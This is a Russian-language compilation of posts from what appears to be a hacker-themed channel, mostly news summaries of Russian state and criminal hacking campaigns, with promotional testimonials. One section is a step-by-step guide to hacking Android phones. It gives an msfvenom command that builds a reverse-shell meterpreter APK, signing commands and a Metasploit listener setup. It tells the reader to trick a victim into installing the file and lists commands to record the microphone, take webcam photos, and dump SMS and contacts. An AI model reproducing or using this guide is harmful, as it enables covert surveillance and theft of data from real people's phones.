В других чатах он был свидетелем того, как группа праздновала массовые кражи, обсуждала способы конвертации украденной криптовалюты в турецкую лиру и даже разрабатывала способы покупки недвижимости для получения турецкого паспорта.

https://i.gyazo.com/3efcd66c10ba8c7840f2bbd473f9925a.png
«Ни один из них не является крупным хакером, но они очень эффективны и научились очень хорошо автоматизировать процессы — их производительность быстро растет», — сказал он.
Взаимодействие Ассора с группой показывает то же самое — профессиональный маркетинг и даже индивидуальное руководство. В одном случае турецкий хакер даже дал ему совет о ресторане в Стамбуле.
Но когда хакера спросили о его связях с русскими, он возразил.
«Нет, братан», — ответил он. «Я не хочу знать — главное не знать [их] лица, а быть рядом с талантливыми людьми».

Взлом Android с помощью Metasploit и Msfvenom

https://i.gyazo.com/b3e5e03f13b57f2b928e24554a1d59cb.jpg

Вступить в наш чат


Вы, наверное, ни раз слышали о самом известном хакерском инструменте под названием Metasploit. Все профессиональные хакеры в один голос скажут, что Metasploit — универсальный инструмент, который имеет множество модулей для взлома Android, IOS, а также Windows. А его работа с Msfvenom считается лучшей комбинацией для взлома устройств Android, что мы сегодня и проверим.

https://i.gyazo.com/9a20e85a77c51cb01f2056a3f1bf195f.jpgMetaspoilt и Msfvenom

Так почему же все так любят Metasploit? Metasploit, созданный Rapid7, имеет самую большую базу эксплойтов, шеллкодов и много разнообразной документации. А самое приятное, что все это абсолютно бесплатно. В народе его даже успели прозвать “хакерским швейцарским ножом”.
Msfvenom — бесплатный инструмент для создания полезной нагрузки (вредоносного файла). Это, так сказать, «брат» Metasploit. Стоит отметить, что теперь этот инструмент есть и в Kali Linux как отдельная опция, позволяющая максимально упростить работу.
Когда дело доходит до взлома телефонов Android, существует множество способов сделать это. Есть приложения, сайты, скрипты и многое другое. Мы уже ни раз демонстрировали вам различные методы взломов, ну а сегодня мы расскажем, как взломать телефон Android с помощью Metasploit и Msfvenom.
Как взломать Android


Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.


Для выполнения этого взлома с использованием Metasploit и Msfvenom вам понадобится ОС Kali Linux.
Итак, приступим к взлому.
Шаг 1. Создание вредоносного APK-файла
Откройте терминал Kali Linux и введите следующую команду:

https://i.gyazo.com/0c87f5a5be3301c338297d495713d77a.jpg# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.78.129 LPORT=4444 R > hacking.apk*LHOST= Ваш IP-адрес

*LPORT= 4444
*Используйте ifconfig, чтобы найти свой IP-адрес, если вы его не знаете.
# ifconfig

Шаг 2. Отправка APK-файла жертве
Вы создали вредоносный .apk-файл шпионского приложения с помощью Metasploit и Msfvenom. По умолчанию он будет сохранен в вашей папке /home/. Найдите свой недавно созданный файл hacking.apk и отправьте его жертве. Используйте навыки социальной инженерии, чтобы заставить жертву установить файл.
*Если у вас возникли какие-либо ошибки или проблемы с подписью, используйте следующее:
Keytool(предустановлен в Kali Linux)


keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000


Jarsigner (предустановлен в Kali Linux)
Затем введите:


jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hacking.apk aliasname


После этого:


jarsigner -verify -verbose -certs hacking.apk


Шаг 3. Настройка Metasploit
Откройте новый терминал и используйте следующую команду, чтобы запустить платформу Metasploit.

https://i.gyazo.com/75240edd71ff872fd844f80f64e0cd70.jpg
# msfconsole
Теперь в консоли платформы Metasploit введите следующее:
use exploit/multi/handler

set payload android/meterpreter/reverse_tcp
после этого настройте адрес прослушивающего хоста:
set LHOST 192.168.78.129

set LPORT 4444

exploit
*LHOST= Ваш IP-адрес
*LPORT= 4444
Шаг 4. Эксплуатация
Теперь, когда жертва откроет приложение на своем телефоне, вы получите полный доступ к устройству.
Вот некоторые команды, которые вы можете использовать:


record_mic — записывает звук с устройства Android и сохраняет его на локальном диске.

webcam_snap — позволяет делать снимки, взломав камеру Android устройства.

webcam_stream — транслирует онлайн видео со взломанной камеры Android.

dump_contacts — копирует все контакты с телефона жертвы.

dump_sms — взламывает сообщения жертвы и сохраняет их в текстовом файле в вашей системе.

geolocate — отслеживает взломанное устройство по местоположению.
Заключение

Хотя Metasploit и Msfvenom не так сложны в использовании, они требуют последовательных шагов, которые необходимо реализовать. Но благодаря нашему руководству любой начинающий хакер с лёгкостью осилит эти инструменты. Надеемся, что эта статья была для вас информативной и полезной. Удачи!

Пророссийские хакеры используют уязвимость WinRAR

https://i.gyazo.com/cbf8ca731e93023eb66feeefe4144876.jpg

Вступить в наш чат
Пророссийские хакерские группы воспользовались недавно обнаруженной уязвимостью безопасности в утилите архивирования WinRAR в рамках фишинговой кампании, направленной на сбор учетных данных из скомпрометированных систем. В этой статье разберем атаку подробнее.

https://i.gyazo.com/da777ddf4c1e470b79addb2bd92234d2.png

Особенности атаки
«Атака включает в себя использование вредоносных архивных файлов, использующих недавно обнаруженную уязвимость, затрагивающую версии программного обеспечения для сжатия WinRAR до 6.23 и отслеживаемую как CVE-2023-38831», — говорится в отчете Cluster25, опубликованном на прошлой неделе.

Архив содержит заминированный PDF-файл, при нажатии на который включается пакетный сценарий Windows, который запускает команды PowerShell для открытия обратной оболочки, предоставляющей злоумышленнику удаленный доступ к целевому хосту.

Также развернут скрипт PowerShell, который крадет данные, включая учетные данные для входа, из браузеров Google Chrome и Microsoft Edge. Захваченная информация передается через сайт веб-перехватчика.

Откуда появилась уязвимость
CVE-2023-38831 относится к серьезной уязвимости в WinRAR, которая позволяет злоумышленникам выполнить произвольный код при попытке просмотреть безопасный файл в ZIP-архиве. Выводы Group-IB в августе 2023 года показали, что с апреля 2023 года эта ошибка использовалась как оружие нулевого дня в атаках, нацеленных на трейдеров.

Это событие произошло после того, как компания Mandiant, принадлежащая Google, составила график «быстро развивающихся» фишинговых операций российского государственного субъекта APT29, нацеленных на дипломатические учреждения, на фоне резкого роста темпов и акцента на Украине в первой половине 2023 года.

Существенные изменения в инструментах и методах работы APT29 «вероятно, предназначены для поддержки увеличения частоты и объема операций и затруднения судебно-медицинского анализа», заявила компания, и что она «одновременно использовала различные цепочки заражения в разных операциях».

https://i.gyazo.com/3d19af2c268e0717aa214a2a34173e88.png

Были ли еще подобные атаки
В июле 2023 года Группа реагирования на компьютерные чрезвычайные ситуации Украины (CERT-UA) обвинила Turla в атаках с использованием вредоносного ПО Capibar и бэкдора Kazuar для шпионских атак на украинские оборонительные объекты.

«Группа Turla — стойкий противник с долгой историей деятельности. Их происхождение, тактика и цели указывают на хорошо финансируемую операцию с высококвалифицированными оперативниками», — сообщила Trend Micro в недавнем отчете. «Turla на протяжении многих лет постоянно развивала свои инструменты и методы и, вероятно, продолжит их совершенствовать».

https://i.gyazo.com/6ee2cc97304ca4a203d031e0ce1316db.png

Русские хакеры атаковали украинских операторов связи

https://i.gyazo.com/1b762b1151e5645efb8d4a9a4481eda7.jpg

Вступить в наш чатСогласно недавнему отчету органов кибербезопасности, с мая российская хакерская группа, известная как Sandworm, атаковала по меньшей мере одиннадцать украинских интернет- и телекоммуникационных провайдеров. Сегодня узнаем больше об этих атаках.

https://i.gyazo.com/a39307ddba24aaab54487e643dbc4d81.png
Особенности атаки
Атаки привели к перебоям в обслуживании и потенциальной утечке данных, сообщила украинская группа реагирования на компьютерные чрезвычайные ситуации CERT-UA.

Sandworm использовал различные вредоносные программы, в том числе Poemgate и Poseidon, для кражи учетных данных и управления зараженными устройствами, а также Whitecat для стирания любых следов.

Кроме того, хакеры использовали скомпрометированные учетные записи VPN, не защищенные многофакторной аутентификацией, для проникновения в сети жертв.

https://i.gyazo.com/9f4e7cc8529b5296e253dc53ed9cae40.png

Последствия взлома
Злоумышленники похитили документы, схемы, контракты и пароли из официальных аккаунтов жертв в социальных сетях, чтобы сделать эту информацию общедоступной или использовать ее для продвижения своих атак.

По данным CERT-UA, на заключительном этапе атаки они вывели из строя активное сетевое и серверное оборудование, а также системы хранения данных.

https://i.gyazo.com/0a40d019d79cae4f1504c4b679c4ded3.png

Мурат Уртембаев — история первого советского хакера

https://i.gyazo.com/0ad0838912b4415c7ce0af7f64b30355.jpg

Вступить в наш чатВ этой статье продолжаем знакомиться с самыми известными русскими хакерами. Первым советским хакером был выпускник МГУ Мурат Уртембаев. В 1983 г. он хакнул систему ПО АвтоВАЗ, в результате чего работа конвейера остановилась на три дня. И это одна из первых «кибер-атак» в СССР, которую обнаружили.

https://i.gyazo.com/7038e6fe022cd56a319a35d06fa59e7b.png
Как стал хакером
Когда в 1983 году молодой выпускник МГУ и работник автозавода ВАЗ оказался в тяжелом финансовом положении, он обратился за помощью к своим работодателям. Руководство завода отговорило Мурата Уртембаева искать другую работу и пообещало ему повышение по службе и повышение зарплаты.

Однако со временем Уртембаев понял, что руководство его обмануло. Затем он разработал план мести. Он тайно изменял программу, используемую для работы сборочной линии, и заражал ее вредоносной ошибкой. Затем он вмешался и устранил проблему, получив должное признание со стороны руководства завода, которое, как он считал, уже давно назрело.

Схема атаки
По плану Мурата, «вирус» должен был запуститься в определенный час. И чтобы обезопасить себя, программист позаботился об алиби — он назначил старт патча на день своего выхода из отпуска. По расчету Уртембаева должен был выйти на работу, обнаружить сбой и устранить его, героически спасая конвейер. Но план провалился, так как программа самостоятельно запустилась раньше на несколько дней…

https://i.gyazo.com/01e39cca05064d6160c6313da77bf327.png
Последствия взлома
В результате вмешательства Уртембаева завод был парализован на три дня. Поскольку это не входило в намерения Уртембаева – он лишь планировал вызвать проблему, чтобы немедленно ее устранить – он обратился к руководству с повинной.

Советский уголовный кодекс не предусматривал, что делать с киберпреступлениями, поэтому Уртембаев был признан виновным в хулиганстве и получил условный срок, а также крупный штраф. Он также стал первым пойманным советским хакером.

Произошедшая история стала известной на весь Союз и вызвала множество споров на счет поступка Уртенбаева. В газетах писали, что системный программист Волжского автозавода модифицировал ПО АСУ ТП главного конвейера, в результате чего работа была остановлена на трое суток. Двести автомобилей не сошло с конвейера ВАЗа, пока программисты искали источник сбоев. Ущерб исчислялся миллионами рублей.

https://i.gyazo.com/219d4c72389c552a8a1c240f3c7d93d0.png

Российские хакеры используют функцию Ngrok и эксплойт WinRAR для атак на посольства

https://i.gyazo.com/89ec1bdd2fd9fb477c34ecfde1b93d7c.jpg

Вступить в наш чатПосле Sandworm и APT28 (известного как Fancy Bear), другая российская хакерская группа, APT29, использует уязвимость CVE-2023-38831 в WinRAR для кибератак. Сегодня узнаем подробнее об этой атаке.

Кто ответственен за взлом
APT29 отслеживается под разными именами (UNC3524,/NobleBaron/Dark Halo/NOBELIUM/Cozy Bear/CozyDuke, SolarStorm) и нацелен на посольства с помощью приманки для продажи автомобилей BMW.

Уязвимость безопасности CVE-2023-38831 затрагивает версии WinRAR до 6.23 и позволяет создавать архивы .RAR и .ZIP, которые могут выполняться в фоновом коде, подготовленном злоумышленником для вредоносных целей.

Уязвимость использовалась как нулевой день с апреля злоумышленниками, нацеленными на форумы по торговле криптовалютами и акциями.

Статический домен Ngrok
В отчете, опубликованном на этой неделе, Совет национальной безопасности и обороны Украины (NDSC) сообщает, что APT29 использует вредоносный ZIP-архив, который в фоновом режиме запускает сценарий для показа PDF-приманки и загрузки кода PowerShell, который загружает и выполняет полезную нагрузку.

Вредоносный архив называется «DIPLOMATIC-CAR-FOR-SALE-BMW.pdf» и нацелен на несколько стран европейского континента, включая Азербайджан, Грецию, Румынию и Италию.

https://i.gyazo.com/b53bf3598a8728cc99ecde49c9a16b37.png

APT29 уже использовал фишинговую приманку с рекламой автомобилей BMW для нападения на дипломатов в Украине во время майской кампании по доставке полезных данных ISO с помощью техники контрабанды HTML.

Украинский NDSC утверждает, что в этих атаках APT29 объединил старую тактику фишинга с новой техникой, обеспечивающей связь с вредоносным сервером.

NDSC сообщает, что российские хакеры использовали бесплатный статический домен Ngrok (новая функция, о которой Ngrok объявила 16 августа) для доступа к серверу управления и контроля (C2), размещенному на их экземпляре Ngrok.

Используя этот метод, злоумышленникам удалось скрыть свою активность и связаться со скомпрометированными системами, не подвергаясь риску быть обнаруженными.

Поскольку исследователи из компании Group-IB, занимающейся кибербезопасностью, сообщили, что уязвимость CVE-2023-38831 в WinRAR использовалась как нулевой день, продвинутые злоумышленники начали включать ее в свои атаки.

Исследователи безопасности из ESET обнаружили в августе атаки, приписываемые российской хакерской группе APT28, которая использовала уязвимость в целевой фишинговой кампании, нацеленной на политические субъекты в ЕС и Украине, используя повестку дня Европейского парламента в качестве приманки.

https://i.gyazo.com/2aee3a49616fca85bf279624d63e8efa.png

В октябрьском отчете Google отмечается, что проблема безопасности была использована российскими и китайскими государственными хакерами для кражи учетных данных и других конфиденциальных данных, а также для обеспечения устойчивости целевых систем.

Украинский NDSC заявляет, что наблюдаемая кампания APT29 выделяется тем, что она сочетает в себе старые и новые методы, такие как использование уязвимости WinRAR для доставки полезных данных и сервисов Ngrok для сокрытия связи с C2.

В отчете украинского агентства представлен набор индикаторов компрометации (IoC), состоящий из имен файлов и соответствующих хешей для сценариев PowerShell и файла электронной почты, а также доменов и адресов электронной почты.

Как российские хакеры атаковали американские ядерные лаборатории

https://i.gyazo.com/30d820285d80b4bd80ccb7aa73ceaec4.jpg

Вступить в наш чатПрошлым летом российская хакерская группа, известная как Cold River, атаковала три ядерные исследовательские лаборатории в Соединенных Штатах. Вспомним, как это было.

Что произошло
В период с августа по сентябрь хакерская команда «Cold River» нацелилась на Брукхейвенскую (BNL), Аргоннскую (ANL) и Ливерморскую национальные лаборатории имени Лоуренса (LLNL), согласно данным Интернета, которые показали, что хакеры создают поддельные страницы входа для каждого учреждения и отправляют электронные письма ученым-ядерщикам, пытаясь заставить их раскрыть свои пароли.

https://i.gyazo.com/56074d2171631632af8ca574d0519fb1.png

Кто стоит за взломом
Хакеры Cold River, впервые появившаяся в поле зрения профессионалов разведки после нападения на министерство иностранных дел Великобритании в 2016 году, в последние годы, согласно интервью с девятью фирмами, занимающимися кибербезопасностью, была замешана в десятках других громких хакерских инцидентов.

«Это одна из самых важных хакерских групп, о которых вы никогда не слышали», — сказал Адам Мейерс, старший вице-президент по разведке американской компании по кибербезопасности CrowdStrike.

Были ли еще атаки
В мае Cold River взломала и опубликовала электронные письма, принадлежащие бывшему главе британской шпионской службы МИ-6. Это была лишь одна из нескольких операций по «взлому и утечке» в прошлом году, проведенных связанными с Россией хакерами, в ходе которых конфиденциальные сообщения были обнародованы в Великобритании, Польше и Латвии.

По данным французской компании по кибербезопасности Sekoia.io, в ходе другой недавней шпионской операции, Cold River зарегистрировала доменные имена, призванные имитировать как минимум три европейские неправительственные организации, расследующие военные преступления.

https://i.gyazo.com/17bdd3a142c625a404c5f7229354d719.png

Русские хакеры представляют «высокий» уровень угрозы для ЕС

https://i.gyazo.com/d066d6eb1d7389ec3eff1433bdda96c0.jpg

Вступить в наш чат

Группа реагирования на чрезвычайные ситуации в киберпространстве Европейского Союза предупредила общественность, что российская хакерская группировка Fancy Bear нацелена на европейские правительства. В этой статье узнаем об инциденте подробнее.

Что произошло
По меньшей мере семь европейских правительств подверглись целенаправленным фишинговым кампаниям, которые включают использование специально разработанных приманок для нацеливания на конкретные важные цели с целью загрузки вредоносного программного обеспечения или предоставления доступа к цифровым системам.

«Мы оцениваем, что уровень угрозы высок», — говорится в записке группы реагирования на кибер-чрезвычайные ситуации ЕС (CERT-EU), засекреченной для ограниченного распространения (TLP Amber+Strict), которую отправили в начале ноября.

Кто стоит за атаками
Fancy Bear, также известная как APT28, — это связанная с российской разведкой хакерская группа, которая, по утверждениям США, стояла за взломами Национального комитета Демократической партии в 2016 году, которые способствовали победе Дональда Трампа на выборах. В 2020 году группа также подверглась санкциям со стороны властей ЕС за взлом немецкого Бундестага в 2015 году.

Группа «использует различные фальшивые документы для заманивания жертв, в том числе протоколы заседаний подкомитета Европейского парламента и отчет Специального комитета ООН», говорится в записке.

Предупреждение прозвучало на фоне растущих опасений, что европейские выборы в следующем году станут мишенью хакерских группировок из стран с программой кибернаступления против Европы, таких как Россия и Китай. Избиратели ЕС отправятся на избирательные участки уже в июне.

https://i.gyazo.com/8c91b8ebcd0259eb92d2997e95ae3fbc.png

Были ли еще атаки
Хакерские группы в течение многих лет преследовали европейские страны кибератаками, кибершпионажем и кампаниями по дезинформации, что страны ЕС считают попытками подорвать их внутреннюю политику и дипломатическую позицию.

В частности, Fancy Bear действует уже не менее 15 лет. По словам западных специалистов, она специализируется на проникновении в правительственные и критически важные отраслевые организации по всему Западу и использовании взломанной информации для подрыва политики.

Ответ на взломы
Представитель Европейской комиссии Йоханнес Барке отказался комментировать новое предупреждение, но заявил, что ведомство «осведомлено о растущем количестве вредоносных кибердействий в глобальном масштабе».

«Регулярный обмен информацией имеет первостепенное значение, чтобы позволить всем ключевым игрокам в ЕС быть в курсе возможных угроз и получать, где это возможно, новые идеи для оценки и смягчения киберрисков», — сказал он.

Европейский парламент отказался от комментариев. Совет ЕС не ответил на запрос о комментариях.

https://i.gyazo.com/61b646c902aa90e99291c7ec6a457b4f.png

APT28 атакует дипломатов вредоносным ПО

https://i.gyazo.com/22b318105deb76f17bf47e512733df65.jpg

Вступить в наш чат
APT28 оказались причастны к новой фишинговой кампании, в которой в качестве фишинговой приманки использовался выставленный на продажу автомобиль для доставки модульного бэкдора Windows под названием HeadLace.

Что произошло
«Кампания, вероятно, была нацелена на дипломатов и началась еще в марте 2024 года», — говорится в опубликованном сегодня отчете Palo Alto Networks Unit 42, в котором говорится, что ее со средней или высокой степенью уверенности приписывают APT28, которая также известна как BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy и TA422.

Стоит отметить, что фишинговые темы «автомобили на продажу» ранее использовались другой российской государственной группировкой под названием APT29 еще в мае 2023 года, что свидетельствует о том, что APT28 перепрофилирует успешные тактики для своих собственных кампаний.

Особенности атаки
Ранее в мае этого года злоумышленник был замешан в серии кампаний, нацеленных на сети по всей Европе с помощью вредоносного ПО HeadLace и веб-страниц для сбора учетных данных.

Атаки характеризуются использованием легитимной службы, известной как webhook[.]site — отличительной черты киберопераций APT28 наряду с Mocky — для размещения вредоносной HTML-страницы, которая сначала проверяет, работает ли целевая машина на Windows, и если да, предлагает ZIP-архив для загрузки («IMG-387470302099.zip»).

Если система не основана на Windows, она перенаправляет на обманное изображение, размещенное на ImgBB, в частности, на внедорожник Audi Q7 Quattro.

В архиве находятся три файла: легитимный исполняемый файл калькулятора Windows, маскирующийся под файл изображения («IMG-387470302099.jpg.exe»), DLL («WindowsCodecs.dll») и пакетный скрипт («zqtxmo.bat»).

https://i.gyazo.com/7b1d7a9dec0269b281fe76605d1acde9.png

Двоичный файл калькулятора используется для загрузки вредоносной DLL, компонента бэкдора HeadLace, предназначенного для запуска пакетного скрипта, который, в свою очередь, выполняет команду в кодировке Base64 для извлечения файла с другого URL-адреса webhook[.]site.

Затем этот файл сохраняется как "IMG387470302099.jpg" в папке загрузок пользователя и переименовывается в "IMG387470302099.cmd" перед выполнением, после чего он удаляется, чтобы стереть следы любой вредоносной активности.

"Хотя инфраструктура, используемая Fighting Ursa, различается для разных кампаний атак, группа часто полагается на эти свободно доступные сервисы", - заявили в Unit 42. "Более того, тактика этой кампании соответствует ранее задокументированным кампаниям Fighting Ursa, а бэкдор HeadLace является эксклюзивным для этого субъекта угрозы".

Двое граждан России признали себя виновными в атаках вируса-вымогателя LockBit

https://i.gyazo.com/10ab479b0f88b5fc22561f2193f45184.jpg

Двое граждан России признали себя виновными в суде США за участие в качестве аффилированных лиц в схеме распространения вируса-вымогателя LockBit и содействие осуществлению атак с использованием вирусов-вымогателей по всему миру.

Что произошло
Среди обвиняемых — 21-летний Руслан Магомедович Астамиров из Чеченской Республики и 34-летний Михаил Васильев, гражданин Канады и России из Брэдфорда, Онтарио.

Астамиров был арестован в Аризоне правоохранительными органами США в мае 2023 года. Васильев, которого уже разыскивают по аналогичным обвинениям в Канаде, был приговорен к почти четырем годам тюремного заключения. Впоследствии он был экстрадирован в США в прошлом месяце.

Это событие произошло более чем через два месяца после того, как Национальное агентство по борьбе с преступностью Великобритании (NCA) разоблачило 31-летнего гражданина России по имени Дмитрий Юрьевич Хорошев как администратора и разработчика операции по вымогательству LockBit.

https://i.gyazo.com/7fbfdaba7b36c4673b24d14b047068f3.png

Подробности взлома
LockBit, который, по оценкам, атаковал более 2500 организаций с момента своего появления к концу 2019 года, заработав не менее 500 миллионов долларов в виде выкупов от своих жертв.

Ранее в этом году синдикат электронной преступности понес серьезный удар после того, как его онлайн-инфраструктура была уничтожена в рамках скоординированной операции правоохранительных органов под названием Cronos. Однако группа продолжает оставаться активной.

Васильев и Астамиров «сначала выявляли и незаконно получали доступ к уязвимым компьютерным системам», — заявило Министерство юстиции США. «Затем они развертывали программу-вымогатель LockBit на компьютерных системах жертв, а также крали и шифровали хранящиеся данные».

«После успешной атаки LockBit аффилированные лица LockBit требовали выкуп от своих жертв в обмен на расшифровку данных жертв и удаление украденных данных».

Сообщается, что Астамиров (он же BETTERPAY, offtitan и Eastfarmer) применил LockBit по меньшей мере против 12 жертв в период с 2020 по 2023 год, получив 1,9 миллиона долларов в качестве выкупа от жертв, проживающих в американском штате Вирджиния, Японии, Франции, Шотландии и Кении.

Он признал себя виновным в сговоре с целью совершения компьютерного мошенничества и злоупотребления и сговоре с целью совершения электронного мошенничества. Обвинения по двум пунктам предусматривают максимальное наказание в виде 25 лет лишения свободы.

Аналогичным образом Васильев, действуя под псевдонимами Ghostrider, Free, Digitalocean90, Digitalocean99, Digitalwaters99, Newwave110, применил вирус-вымогатель против 12 компаний в американских штатах Нью-Джерси и Мичиган, а также в Великобритании и Швейцарии.

https://i.gyazo.com/8dbac8716c9134fec605821a265be379.png

Приговор
Васильеву грозит до 45 лет тюрьмы по обвинениям, связанным с сговором с целью совершения компьютерного мошенничества и злоупотребления, преднамеренным повреждением защищенного компьютера, передачей угрозы в связи с повреждением защищенного компьютера и сговором с целью совершения электронного мошенничества.

Оба обвиняемых должны быть приговорены 8 января 2025 года. Хорошеву было предъявлено обвинение по 26 пунктам ранее в мае этого года за руководство операцией LockBit, хотя он остается на свободе.

«Распространенное заблуждение, что киберхакеры не будут пойманы правоохранительными органами, потому что они умнее и опытнее нас», — сказал Джеймс Э. Деннехи, специальный агент ФБР, отвечающий за отделение в Ньюарке.

«Двое членов филиала LockBit, признавшие себя виновными в своих преступлениях в федеральном суде США, показывают, что мы можем остановить их и привлечь к ответственности. Эти злоумышленники считают, что могут действовать безнаказанно, и не боятся быть пойманными, потому что они находятся в стране, где чувствуют себя в безопасности и защищенными».

Русские хакеры используют USB-червя LitterDrifter
https://i.gyazo.com/cf6c131bd71df7f467ceb86e3df426f2.jpg

Вступить в наш чат

В этой статье расскажем, как русские хакеры были замечены в использовании USB-червя под названием LitterDrifter в атаках, направленных на украинские организации.
Что произошло
Check Point, в котором подробно описаны новейшие тактики Гамаредона (также известные как Aqua Blizzard, Iron Tilden, Primitive Bear, Shuckworm и Winterflounder), заклеймил группировку как участвующую в крупномасштабных кампаниях, за которыми следуют «усилия по сбору данных, направленные на конкретные цели, выбор которых вероятно, мотивировано шпионскими целями».
Особенности взлома
Червь LitterDrifter обладает двумя основными функциями: автоматическое распространение вредоносного ПО через подключенные USB-накопители, а также взаимодействие с серверами управления и контроля (C&C) злоумышленника. Также предполагается, что это развитие USB-червя на базе PowerShell, который ранее был раскрыт Symantec в июне 2023 года.

Модуль распространения, написанный на VBS, отвечает за распространение червя в виде скрытого файла на USB-накопителе вместе с ложным LNK, которому присвоены случайные имена.

«Подход Gamaredon к C&C довольно уникален, поскольку он использует домены в качестве заполнителя для циркулирующих IP-адресов, фактически используемых в качестве серверов C2», — пояснили в Check Point.

LitterDrifter также способен подключаться к командному серверу, полученному из канала Telegram. Эту тактику злоумышленник неоднократно использовал, по крайней мере, с начала года.

Фирма по кибербезопасности заявила, что она также обнаружила признаки возможного заражения за пределами Украины на основе материалов VirusTotal из США, Вьетнама, Чили, Польши, Германии и Гонконга.

https://i.gyazo.com/48fdfa18303f07f51fa3168f2f65a5e1.png

Русские хакеры используют фейковые сайты брендов

https://i.gyazo.com/f5b37ecd7aa8c5fb31b18ecc27c80427.jpg

Вступить в наш чат

Исследователи в области кибербезопасности пролили свет на сложную кампанию по краже информации, которая выдает себя за настоящие бренды и распространяет вредоносное ПО, такое как DanaBot и StealC. Сегодня узнаем подробнее об этих взломах.
Что произошло
Взломы, организованные русскоязычными хакерам и получившие общее кодовое название Tusk, как говорят, охватывает несколько подкампаний, использующих репутацию платформ, чтобы обманом заставить пользователей загрузить вредоносное ПО с помощью поддельных сайтов и аккаунтов социальных сетей.

«Все активные подкампании размещают начальный загрузчик на Dropbox», — заявили исследователи «Лаборатории Касперского» Эльсаид Эльрефаи и АбдулРхман Альфаифи. «Этот загрузчик отвечает за доставку дополнительных образцов вредоносного ПО на компьютер жертвы, которые в основном являются похитителями информации (DanaBot и StealC) и клипперами».

https://i.gyazo.com/715c09c9f8c9954ce80ea2f309669227.png

Особенности взлома
Из 19 подкампаний, выявленных на сегодняшний день, три, как сообщается, в настоящее время активны. Название «Tusk» является отсылкой к слову «Mammoth», которое злоумышленники использовали в сообщениях журнала, связанных с первоначальным загрузчиком. Стоит отметить, что mammoth — это жаргонное слово, часто используемое российскими группами электронной преступности для обозначения жертв.

Кампании также примечательны применением фишинговых тактик для обмана жертв, чтобы заставить их расстаться со своей личной и финансовой информацией, которая затем продается в даркнете или используется для получения несанкционированного доступа к их игровым аккаунтам и криптовалютным кошелькам.

Первая из трех подкампаний, известная как TidyMe, имитирует peerme[.]io с похожим сайтом, размещенным на tidyme[.]io (а также tidymeapp[.]io и tidyme[.]app), который предлагает щелкнуть, чтобы загрузить вредоносную программу для систем Windows и macOS. Исполняемый файл предоставляется из Dropbox.

Загрузчик представляет собой приложение Electron, которое при запуске предлагает жертве ввести отображаемую CAPTCHA, после чего отображается основной интерфейс приложения, в то время как два дополнительных вредоносных файла скрытно извлекаются и выполняются в фоновом режиме.

Оба вида полезной нагрузки, обнаруженные в кампании, представляют собой артефакты Hijack Loader, которые в конечном итоге запускают вариант вредоносного ПО-кральщика StealC с возможностями сбора широкого спектра информации.

https://i.gyazo.com/0e37a2a99cd8bbe1b32914451db40f9f.png

Я хочу выразить огромную благодарность за отличные статьи и мануалы, которые предлагает BlackMast. Они настоящие кладезь знаний и полезной информации по самым разным темам. Каждая статья написана профессионально и подробно, с множеством полезных советов и рекомендаций. Особенно хочу отметить подкасты BlackMast - они очень информативны и интересны, а также отлично подходят для прослушивания в дороге или во время занятий спортом. Спасибо за ваш труд и за то, что делитесь своими знаниями с нами, BlackMast!

Рекомендую обратиться к официальному веб-сайту или иным официальным источникам, чтобы получить более подробную информацию о предоставляемых ими материалах. Также можно использовать поисковые системы или платформы для поиска контента, которые могут предложить интересующие вас статьи, мануалы или подкасты.

Я хочу выразить свою огромную благодарность BlackMast за отличные статьи, мануалы и подкасты! Как начинающий программист, я часто сталкиваюсь с трудностями и вопросами, на которые сложно найти ответы в интернете. Но благодаря материалам от BlackMast, я всегда могу найти подробные и понятные объяснения даже самых сложных тем. Кроме того, я хочу отметить, что все материалы представлены в удобном и легком для восприятия формате, что делает процесс обучения еще более приятным. Спасибо за ваш труд и за то, что делаете мир программирования более доступным и понятным для всех.

Русские хакеры атакуют американских чиновников

https://i.gyazo.com/8180f51b785a6aae02f43bf2e85cfd74.jpg

Вступить в чат



Русские хакеры преследуют чиновников правительства США, работников оборонного сектора и других в новой фишинговой кампании по электронной почте, нацеленной на тысячи людей, согласно данным Microsoft Corp. В этой статье узнаем об инциденте подробнее.
Что произошло
Хакеры отправили «серию высокоцелевых фишинговых писем» тысячам людей в более чем 100 организациях с 22 октября, согласно сообщению в блоге Microsoft Threat Intelligence, опубликованному во вторник.

Последняя кампания усилит растущую обеспокоенность по поводу неспособности США перехитрить предполагаемых российских и китайских хакеров. В пятницу ФБР заявило, что расследует несанкционированный доступ китайских государственных хакеров, нацеленных на коммерческий телекоммуникационный сектор.
Подробности атаки
В некоторых письмах, которые были частью последней кампании, отправители выдавали себя за сотрудников Microsoft. Целевой фишинг подразумевает отправку адресованных писем отдельным лицам, включающих ссылки на вредоносные веб-сайты, которые затем могут украсть информацию.


https://i.gyazo.com/9fc7d0dd4093c192ad01506c35b70325.png

Microsoft заявила, что атаки совершаются Midnight Blizzard, которую правительства США и Великобритании связали с СВР, российской службой внешней разведки.

В январе компания заявила, что группа атаковала ее корпоративные системы, проникнув в «небольшое количество» учетных записей электронной почты, включая старшее руководство и сотрудников, работающих в сфере кибербезопасности и права.

В апреле федеральным агентствам США было приказано проанализировать электронные письма, сбросить скомпрометированные учетные данные и работать над обеспечением безопасности учетных записей Microsoft. В то время Агентство по кибербезопасности и безопасности инфраструктуры заявило, что инцидент представляет собой «серьезный и неприемлемый риск» для агентств, согласно апрельской директиве.

CISA и Госдепартамент США не сразу ответили на запросы о комментариях. Посольство России в Вашингтоне не сразу ответило на запросы о комментариях.

https://i.gyazo.com/40be4717a9d6846b953726ed0545b124.png